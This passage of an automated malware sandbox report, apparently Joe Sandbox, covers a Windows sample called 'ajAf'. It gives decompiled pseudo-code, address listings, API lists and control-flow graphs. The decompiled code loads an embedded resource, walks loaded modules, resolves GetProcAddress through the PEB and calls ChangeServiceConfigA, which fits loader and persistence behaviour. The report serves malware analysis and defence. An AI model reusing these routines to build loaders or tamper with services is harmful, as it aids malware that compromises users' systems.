                                                          									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                          									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                          									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                          									__eflags = _t378;
                                                          									if(_t378 >= 0) {
                                                          										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                          										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                          										__eflags = _t383;
                                                          										if(_t383 >= 0) {
                                                          											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                          											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                          											__eflags = _t385;
                                                          											if(_t385 >= 0) {
                                                          												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                          												E00401870(_t563 + 0x44, _t552, "_._");
                                                          												_t539 = __imp__#8;
                                                          												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                          												 *_t539(_t563 + 0x94);
                                                          												E00401870(_t563 + 0x3c, _t552, "___");
                                                          												 *_t539(_t563 + 0xa4);
                                                          												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                          												_t542 =  *(_t563 + 0x58);
                                                          												__eflags = _t542;
                                                          												if(_t542 == 0) {
                                                          													E0040AD90(0x80004003);
                                                          												}
                                                          												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                          												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                          												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                          												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                          												_t543 = _t396;
                                                          												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                          												__imp__#23(_t543, _t563 + 0x48);
                                                          												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                          												_t564 = _t563 + 0xc;
                                                          												__imp__#24(_t543);
                                                          												_t399 =  *(_t564 + 0x54);
                                                          												__eflags = _t399;
                                                          												if(_t399 == 0) {
                                                          													_t399 = E0040AD90(0x80004003);
                                                          												}
                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                          												__eflags = _t543;
                                                          												if(_t543 != 0) {
                                                          													__imp__#16(_t543); // executed
                                                          												}
                                                          												_t402 =  *(_t564 + 0x34);
                                                          												__eflags = _t402;
                                                          												if(_t402 == 0) {
                                                          													_t402 = E0040AD90(0x80004003);
                                                          												}
                                                          												_t469 =  *(_t564 + 0x40);
                                                          												_t555 = _t402;
                                                          												__eflags = _t469;
                                                          												if(_t469 == 0) {
                                                          													_t531 = 0;
                                                          													__eflags = 0;
                                                          												} else {
                                                          													_t531 =  *_t469;
                                                          												}
                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                          												__imp__#411(0xc, 0, 0);
                                                          												_t471 =  *(_t564 + 0x3c);
                                                          												__eflags = _t471;
                                                          												if(_t471 == 0) {
                                                          													E0040AD90(0x80004003);
                                                          												}
                                                          												_t405 =  *(_t564 + 0x38);
                                                          												__eflags = _t405;
                                                          												if(_t405 == 0) {
                                                          													_t514 = 0;
                                                          													__eflags = 0;
                                                          												} else {
                                                          													_t514 =  *_t405;
                                                          												}
                                                          												_t563 = _t564 - 0x10;
                                                          												_t407 = _t563;
                                                          												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                          												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                          												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                          												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                          												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                          												_t538 = __imp__#9; // 0x74f3cf00
                                                          												_t538->i(_t563 + 0xa4);
                                                          												E004019A0(_t563 + 0x38);
                                                          												_t538->i(_t563 + 0x94);
                                                          												_t413 =  *(_t563 + 0x3c);
                                                          												__eflags = _t413;
                                                          												if(_t413 != 0) {
                                                          													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                          												}
                                                          												E004019A0(_t563 + 0x40);
                                                          												_t415 =  *(_t563 + 0x34);
                                                          												__eflags = _t415;
                                                          												if(_t415 != 0) {
                                                          													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                          									__eflags = _t379 - _t563 + 0x178;
                                                          									if(__eflags != 0) {
                                                          										_push(_t379);
                                                          										E0040B6B5(0, _t528, _t538, __eflags);
                                                          										_t563 = _t563 + 4;
                                                          									}
                                                          								}
                                                          							}
                                                          							_t369 =  *(_t563 + 0x54);
                                                          							__eflags = _t369;
                                                          							if(_t369 != 0) {
                                                          								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                          							}
                                                          							_t370 =  *(_t563 + 0x58);
                                                          							__eflags = _t370;
                                                          							if(_t370 != 0) {
                                                          								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                          							}
                                                          						}
                                                          						goto L80;
                                                          					} else {
                                                          						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                          						_t565 = _t557 + 8;
                                                          						_t547 = _t428;
                                                          						_t520 = _t565 + 0x298;
                                                          						while(1) {
                                                          							_t429 =  *_t520;
                                                          							if(_t429 !=  *_t547) {
                                                          								break;
                                                          							}
                                                          							if(_t429 == 0) {
                                                          								L7:
                                                          								_t429 = 0;
                                                          							} else {
                                                          								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                          								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                          									break;
                                                          								} else {
                                                          									_t520 = _t520 + 2;
                                                          									_t547 = _t547 + 2;
                                                          									if(_t493 != 0) {
                                                          										continue;
                                                          									} else {
                                                          										goto L7;
                                                          									}
                                                          								}
                                                          							}
                                                          							L9:
                                                          							if(_t429 != 0) {
                                                          								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                          								_t557 = _t565 + 8;
                                                          								_t548 = _t431;
                                                          								_t488 = _t557 + 0x298;
                                                          								while(1) {
                                                          									_t432 =  *_t488;
                                                          									__eflags = _t432 -  *_t548;
                                                          									if(_t432 !=  *_t548) {
                                                          										break;
                                                          									}
                                                          									__eflags = _t432;
                                                          									if(_t432 == 0) {
                                                          										L16:
                                                          										_t432 = 0;
                                                          									} else {
                                                          										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                          										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                          										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                          											break;
                                                          										} else {
                                                          											_t488 = _t488 + 2;
                                                          											_t548 = _t548 + 2;
                                                          											__eflags = _t432;
                                                          											if(_t432 != 0) {
                                                          												continue;
                                                          											} else {
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          									L18:
                                                          									__eflags = _t432;
                                                          									if(_t432 == 0) {
                                                          										goto L10;
                                                          									} else {
                                                          										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                          										__eflags = _t435;
                                                          										if(_t435 != 0) {
                                                          											do {
                                                          												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                          												_t566 = _t557 + 8;
                                                          												_t549 = _t437;
                                                          												_t490 = _t566 + 0x298;
                                                          												while(1) {
                                                          													_t438 =  *_t490;
                                                          													__eflags = _t438 -  *_t549;
                                                          													if(_t438 !=  *_t549) {
                                                          														break;
                                                          													}
                                                          													__eflags = _t438;
                                                          													if(_t438 == 0) {
                                                          														L26:
                                                          														_t438 = 0;
                                                          													} else {
                                                          														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                          														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                          														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                          															break;
                                                          														} else {
                                                          															_t490 = _t490 + 2;
                                                          															_t549 = _t549 + 2;
                                                          															__eflags = _t438;
                                                          															if(_t438 != 0) {
                                                          																continue;
                                                          															} else {
                                                          																goto L26;
                                                          															}
                                                          														}
                                                          													}
                                                          													L28:
                                                          													__eflags = _t438;
                                                          													if(_t438 == 0) {
                                                          														goto L10;
                                                          													} else {
                                                          														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                          														_t557 = _t566 + 8;
                                                          														_t550 = _t439;
                                                          														_t492 = _t557 + 0x298;
                                                          														while(1) {
                                                          															_t440 =  *_t492;
                                                          															__eflags = _t440 -  *_t550;
                                                          															if(_t440 !=  *_t550) {
                                                          																break;
                                                          															}
                                                          															__eflags = _t440;
                                                          															if(_t440 == 0) {
                                                          																L34:
                                                          																_t440 = 0;
                                                          															} else {
                                                          																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                          																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                          																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                          																	break;
                                                          																} else {
                                                          																	_t492 = _t492 + 2;
                                                          																	_t550 = _t550 + 2;
                                                          																	__eflags = _t440;
                                                          																	if(_t440 != 0) {
                                                          																		continue;
                                                          																	} else {
                                                          																		goto L34;
                                                          																	}
                                                          																}
                                                          															}
                                                          															L36:
                                                          															__eflags = _t440;
                                                          															if(_t440 == 0) {
                                                          																goto L10;
                                                          															} else {
                                                          																goto L37;
                                                          															}
                                                          															goto L81;
                                                          														}
                                                          														asm("sbb eax, eax");
                                                          														asm("sbb eax, 0xffffffff");
                                                          														goto L36;
                                                          													}
                                                          													goto L81;
                                                          												}
                                                          												asm("sbb eax, eax");
                                                          												asm("sbb eax, 0xffffffff");
                                                          												goto L28;
                                                          												L37:
                                                          												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                          												__eflags = _t442;
                                                          											} while (_t442 != 0);
                                                          										}
                                                          										goto L38;
                                                          									}
                                                          									goto L81;
                                                          								}
                                                          								asm("sbb eax, eax");
                                                          								asm("sbb eax, 0xffffffff");
                                                          								goto L18;
                                                          							} else {
                                                          								L10:
                                                          								CloseHandle(_t525);
                                                          								return 0;
                                                          							}
                                                          							goto L81;
                                                          						}
                                                          						asm("sbb eax, eax");
                                                          						asm("sbb eax, 0xffffffff");
                                                          						goto L9;
                                                          					}
                                                          				}
                                                          				L81:
                                                          			}
                                                          0x00401ee9
                                                          0x00401ee9
                                                          0x00401ef7
                                                          0x00401efc
                                                          0x00401f02
                                                          0x00401f08
                                                          0x00401f0c
                                                          0x00401f15
                                                          0x00401f18
                                                          0x00401f1a
                                                          0x00401f1c
                                                          0x00401f22
                                                          0x00401f22
                                                          0x00401f24
                                                          0x00401f28
                                                          0x00401f2f
                                                          0x00401f33
                                                          0x00401f33
                                                          0x00401f40
                                                          0x00401f45
                                                          0x00401f4a
                                                          0x00401f4b
                                                          0x00401f50
                                                          0x00401f58
                                                          0x00401f58
                                                          0x00401f58
                                                          0x00401f58
                                                          0x00401f33
                                                          0x00401f63
                                                          0x00401f63
                                                          0x00401f69
                                                          0x00401f72
                                                          0x00401f72
                                                          0x00401f72
                                                          0x00401f73
                                                          0x00401f75
                                                          0x00401f7b
                                                          0x00401f80
                                                          0x00401f81
                                                          0x00401f86
                                                          0x00401f86
                                                          0x00401f8c
                                                          0x00401f8d
                                                          0x00401f8d
                                                          0x00401f9d
                                                          0x00401fa2
                                                          0x00401fa6
                                                          0x00401fac
                                                          0x00401faf
                                                          0x00401fb6
                                                          0x00401fbf
                                                          0x00401fc4
                                                          0x00401fc8
                                                          0x00401fce
                                                          0x00401fd3
                                                          0x00401fe0
                                                          0x00401fec
                                                          0x00401ffe
                                                          0x00402001
                                                          0x00402006
                                                          0x0040200b
                                                          0x00402010
                                                          0x00402015
                                                          0x0040201a
                                                          0x0040201f
                                                          0x00402024
                                                          0x00402029
                                                          0x0040202e
                                                          0x00402033
                                                          0x00402038
                                                          0x0040203d
                                                          0x00402042
                                                          0x00402047
                                                          0x0040204c
                                                          0x00402051
                                                          0x00402056
                                                          0x0040205b
                                                          0x00402060
                                                          0x00402065
                                                          0x0040206a
                                                          0x0040206f
                                                          0x00402074
                                                          0x00402079
                                                          0x0040207e
                                                          0x00402083
                                                          0x00402088
                                                          0x0040208d
                                                          0x00402092
                                                          0x00402097
                                                          0x0040209c
                                                          0x004020a1
                                                          0x004020a5
                                                          0x004020aa
                                                          0x004020ae
                                                          0x004020b4
                                                          0x004020b6
                                                          0x004020bb
                                                          0x004020c0
                                                          0x004020c5
                                                          0x004020ca
                                                          0x004020cf
                                                          0x004020d4
                                                          0x004020e1
                                                          0x004020e6
                                                          0x004020eb
                                                          0x004020f0
                                                          0x004020f5
                                                          0x004020fa
                                                          0x004020ff
                                                          0x00402104
                                                          0x00402109
                                                          0x0040210e
                                                          0x00402113
                                                          0x00402118
                                                          0x0040211d
                                                          0x00402122
                                                          0x00402127
                                                          0x0040212c
                                                          0x00402131
                                                          0x00402136
                                                          0x0040213b
                                                          0x00402140
                                                          0x00402145
                                                          0x0040214a
                                                          0x0040214f
                                                          0x00402154
                                                          0x00402159
                                                          0x0040215e
                                                          0x00402163
                                                          0x00402167
                                                          0x0040216c
                                                          0x00402171
                                                          0x00402177
                                                          0x00402179
                                                          0x0040217c
                                                          0x0040217e
                                                          0x00402183
                                                          0x00402188
                                                          0x0040218f
                                                          0x00402196
                                                          0x0040219a
                                                          0x0040219e
                                                          0x004021a2
                                                          0x004021a4
                                                          0x004021bc
                                                          0x004021be
                                                          0x004021c0
                                                          0x004021c6
                                                          0x004021ca
                                                          0x004021e5
                                                          0x004021ec
                                                          0x004021f1
                                                          0x00402213
                                                          0x00402215
                                                          0x00402217
                                                          0x0040221d
                                                          0x00402239
                                                          0x0040223b
                                                          0x0040223d
                                                          0x00402243
                                                          0x0040224d
                                                          0x0040224f
                                                          0x00402251
                                                          0x00402260
                                                          0x00402264
                                                          0x00402269
                                                          0x00402277
                                                          0x0040227b
                                                          0x00402286
                                                          0x00402293
                                                          0x004022af
                                                          0x004022b1
                                                          0x004022b5
                                                          0x004022b7
                                                          0x004022be
                                                          0x004022be
                                                          0x004022d7
                                                          0x004022e8
                                                          0x004022ef
                                                          0x004022f6
                                                          0x00402300
                                                          0x00402304
                                                          0x00402308
                                                          0x00402315
                                                          0x0040231a
                                                          0x0040231e
                                                          0x00402324
                                                          0x00402328
                                                          0x0040232a
                                                          0x00402331
                                                          0x00402331
                                                          0x0040234e
                                                          0x00402350
                                                          0x00402352
                                                          0x00402355
                                                          0x00402355
                                                          0x0040235b
                                                          0x0040235f
                                                          0x00402361
                                                          0x00402368
                                                          0x00402368
                                                          0x0040236d
                                                          0x00402371
                                                          0x00402373
                                                          0x00402375
                                                          0x0040237b
                                                          0x0040237b
                                                          0x00402377
                                                          0x00402377
                                                          0x00402377
                                                          0x00402390
                                                          0x00402396
                                                          0x0040239c
                                                          0x004023a0
                                                          0x004023a2
                                                          0x004023a9
                                                          0x004023a9
                                                          0x004023ae
                                                          0x004023b2
                                                          0x004023b4
                                                          0x004023ba
                                                          0x004023ba
                                                          0x004023b6
                                                          0x004023b6
                                                          0x004023b6
                                                          0x004023ce
                                                          0x004023d1
                                                          0x004023d3
                                                          0x004023dd
                                                          0x004023ec
                                                          0x004023ef
                                                          0x004023fe
                                                          0x00402401
                                                          0x00402403
                                                          0x00402411
                                                          0x00402417
                                                          0x00402424
                                                          0x00402426
                                                          0x0040242a
                                                          0x0040242c
                                                          0x00402434
                                                          0x00402434
                                                          0x0040243a
                                                          0x0040243f
                                                          0x00402443
                                                          0x00402445
                                                          0x0040244d
                                                          0x0040244d
                                                          0x00402445
                                                          0x00402251
                                                          0x0040223d
                                                          0x0040244f
                                                          0x0040245d
                                                          0x0040245f
                                                          0x00402461
                                                          0x00402462
                                                          0x00402467
                                                          0x00402467
                                                          0x0040245f
                                                          0x004021ca
                                                          0x0040246a
                                                          0x0040246e
                                                          0x00402470
                                                          0x00402478
                                                          0x00402478
                                                          0x0040247a
                                                          0x0040247e
                                                          0x00402480
                                                          0x00402488
                                                          0x00402488
                                                          0x00402480
                                                          0x00000000
                                                          0x00401c55
                                                          0x00401c62
                                                          0x00401c67
                                                          0x00401c6a
                                                          0x00401c6c
                                                          0x00401c73
                                                          0x00401c73
                                                          0x00401c77
                                                          0x00000000
                                                          0x00000000
                                                          0x00401c7b
                                                          0x00401c8f
                                                          0x00401c8f
                                                          0x00401c7d
                                                          0x00401c7d
                                                          0x00401c83
                                                          0x00000000
                                                          0x00401c85
                                                          0x00401c85
                                                          0x00401c88
                                                          0x00401c8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401c8d
                                                          0x00401c83
                                                          0x00401c98
                                                          0x00401c9a
                                                          0x00401cbd
                                                          0x00401cc2
                                                          0x00401cc5
                                                          0x00401cc7
                                                          0x00401cd0
                                                          0x00401cd0
                                                          0x00401cd2
                                                          0x00401cd4
                                                          0x00000000
                                                          0x00000000
                                                          0x00401cd6
                                                          0x00401cd8
                                                          0x00401cec
                                                          0x00401cec
                                                          0x00401cda
                                                          0x00401cda
                                                          0x00401cdd
                                                          0x00401ce0
                                                          0x00000000
                                                          0x00401ce2
                                                          0x00401ce2
                                                          0x00401ce5
                                                          0x00401ce8
                                                          0x00401cea
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401cea
                                                          0x00401ce0
                                                          0x00401cf5
                                                          0x00401cf5
                                                          0x00401cf7
                                                          0x00000000
                                                          0x00401cf9
                                                          0x00401d02
                                                          0x00401d07
                                                          0x00401d09
                                                          0x00401d10
                                                          0x00401d1d
                                                          0x00401d22
                                                          0x00401d25
                                                          0x00401d27
                                                          0x00401d30
                                                          0x00401d30
                                                          0x00401d32
                                                          0x00401d34
                                                          0x00000000
                                                          0x00000000
                                                          0x00401d36
                                                          0x00401d38
                                                          0x00401d4c
                                                          0x00401d4c
                                                          0x00401d3a
                                                          0x00401d3a
                                                          0x00401d3d
                                                          0x00401d40
                                                          0x00000000
                                                          0x00401d42
                                                          0x00401d42
                                                          0x00401d45
                                                          0x00401d48
                                                          0x00401d4a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401d4a
                                                          0x00401d40
                                                          0x00401d55
                                                          0x00401d55
                                                          0x00401d57
                                                          0x00000000
                                                          0x00401d5d
                                                          0x00401d6a
                                                          0x00401d6f
                                                          0x00401d72
                                                          0x00401d74
                                                          0x00401d80
                                                          0x00401d80
                                                          0x00401d82
                                                          0x00401d84
                                                          0x00000000
                                                          0x00000000
                                                          0x00401d86
                                                          0x00401d88
                                                          0x00401d9c
                                                          0x00401d9c
                                                          0x00401d8a
                                                          0x00401d8a
                                                          0x00401d8d
                                                          0x00401d90
                                                          0x00000000
                                                          0x00401d92
                                                          0x00401d92
                                                          0x00401d95
                                                          0x00401d98
                                                          0x00401d9a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401d9a
                                                          0x00401d90
                                                          0x00401da5

                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 004019FD
                                                          • _getenv.LIBCMT ref: 00401ABA
                                                          • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                          • Module32First.KERNEL32 ref: 00401C48
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                          • Module32Next.KERNEL32 ref: 00401D02
                                                          • Module32Next.KERNEL32 ref: 00401DB6
                                                          • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                          • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                          • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                          • _malloc.LIBCMT ref: 00401EBA
                                                          • _memset.LIBCMT ref: 00401EDD
                                                          • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                          • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                          • API String ID: 1430744539-2962942730
                                                          • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                          • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                          • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                          • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 260 1fc092b-1fc0970 GetPEB 261 1fc0972-1fc0978 260->261 262 1fc098c-1fc098e 261->262 263 1fc097a-1fc098a call 1fc0d35 261->263 262->261 265 1fc0990 262->265 263->262 268 1fc0992-1fc0994 263->268 267 1fc0996-1fc0998 265->267 269 1fc0a3b-1fc0a3e 267->269 268->267 270 1fc099d-1fc09d3 268->270 271 1fc09dc-1fc09ee call 1fc0d0c 270->271 274 1fc09d5-1fc09d8 271->274 275 1fc09f0-1fc0a3a 271->275 274->271 275->269
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$GetProcAddress.$l
                                                          • API String ID: 0-2784972518
                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                          • Instruction ID: 4f9cfe251a72ca159fbf4fc79e39fe33bf16e20f35afd1b8c11fb9f49f0634be
                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                          • Instruction Fuzzy Hash: 993139B690060ADFDB10CF99C980AEDBBF5FF48724F14414AE441A7711DB71EA45CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 283 223a1a8-223a232 285 223a234-223a23e 283->285 286 223a26b-223a28d 283->286 285->286 287 223a240-223a242 285->287 293 223a2c9-223a2ea 286->293 294 223a28f-223a29c 286->294 288 223a265-223a268 287->288 289 223a244-223a24e 287->289 288->286 291 223a252-223a261 289->291 292 223a250 289->292 291->291 295 223a263 291->295 292->291 300 223a323-223a345 293->300 301 223a2ec-223a2f6 293->301 294->293 296 223a29e-223a2a0 294->296 295->288 298 223a2c3-223a2c6 296->298 299 223a2a2-223a2ac 296->299 298->293 302 223a2b0-223a2bf 299->302 303 223a2ae 299->303 309 223a381-223a3a2 300->309 310 223a347-223a354 300->310 301->300 305 223a2f8-223a2fa 301->305 302->302 304 223a2c1 302->304 303->302 304->298 306 223a31d-223a320 305->306 307 223a2fc-223a306 305->307 306->300 311 223a30a-223a319 307->311 312 223a308 307->312 320 223a3a4-223a3ae 309->320 321 223a3db-223a3fd 309->321 310->309 313 223a356-223a358 310->313 311->311 314 223a31b 311->314 312->311 315 223a37b-223a37e 313->315 316 223a35a-223a364 313->316 314->306 315->309 318 223a366 316->318 319 223a368-223a377 316->319 318->319 319->319 322 223a379 319->322 320->321 323 223a3b0-223a3b2 320->323 327 223a439-223a4b0 ChangeServiceConfigA 321->327 328 223a3ff-223a40c 321->328 322->315 325 223a3d5-223a3d8 323->325 326 223a3b4-223a3be 323->326 325->321 329 223a3c2-223a3d1 326->329 330 223a3c0 326->330 338 223a4b2-223a4b8 327->338 339 223a4b9-223a4f8 327->339 328->327 331 223a40e-223a410 328->331 329->329 332 223a3d3 329->332 330->329 333 223a433-223a436 331->333 334 223a412-223a41c 331->334 332->325 333->327 336 223a420-223a42f 334->336 337 223a41e 334->337 336->336 341 223a431 336->341 337->336 338->339 343 223a4fa-223a4fe 339->343 344 223a508-223a50c 339->344 341->333 343->344 345 223a500 343->345 346 223a50e-223a512 344->346 347 223a51c-223a520 344->347 345->344 346->347 348 223a514 346->348 349 223a522-223a526 347->349 350 223a530-223a534 347->350 
348->347 349->350 351 223a528 349->351 352 223a536-223a53a 350->352 353 223a544-223a548 350->353 351->350 352->353 354 223a53c 352->354 355 223a54a-223a54e 353->355 356 223a558-223a55c 353->356 354->353 355->356 357 223a550 355->357 358 223a55e-223a562 356->358 359 223a56c 356->359 357->356 358->359 360 223a564 358->360 360->359
                                                          APIs
                                                          • ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0223A4A0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: ChangeConfigService
                                                          • String ID:
                                                          • API String ID: 3849694230-0
                                                          • Opcode ID: 11db13bf2c0f79db0f4dc11cb36cd97602b3491a5ed3eafc687fb2940b52cc56
                                                          • Instruction ID: 96e6211786edf2946aa9404fa65786b810de2943da72f4ec61ed2392a24725fd
                                                          • Opcode Fuzzy Hash: 11db13bf2c0f79db0f4dc11cb36cd97602b3491a5ed3eafc687fb2940b52cc56
                                                          • Instruction Fuzzy Hash: B7C12AB1D2061A8FDB11CFA8C8857AEBBF1FF44314F148639E895E6298D7759881CF81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
